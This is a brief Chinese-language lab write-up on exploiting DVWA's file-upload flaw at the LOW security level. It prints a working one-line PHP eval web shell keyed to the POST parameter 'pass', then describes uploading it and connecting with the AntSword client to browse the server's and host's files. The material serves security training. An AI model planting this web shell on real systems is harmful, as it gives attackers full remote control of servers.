实验准备
首先保存一个一句话木马文件Untitled-1.php
<?php @eval($_POST['pass']);?>
DVWA平台
中国蚁剑
实验步骤
-
首先进入DVWA平台,选择LOW安全级别
-
在low安全级别中,网站未对上传的文件进行任何验证所以可以直接上传PHP或ASP一句话木马(可通过右下角的view source查看后台源代码)
-
将木马文件上传,可以观察到回显的路径,并且查看网站资源可可以看到文件已经被成功上传了
-
使用中国蚁剑连接,右击添加数据
连接时的密码其实就是一句话木马的内容
-
成功连接
-
保存
-
双击打开可以看到整个网站的结构和文件,甚至还暴露的电脑的所有文件(主机已经彻底沦陷)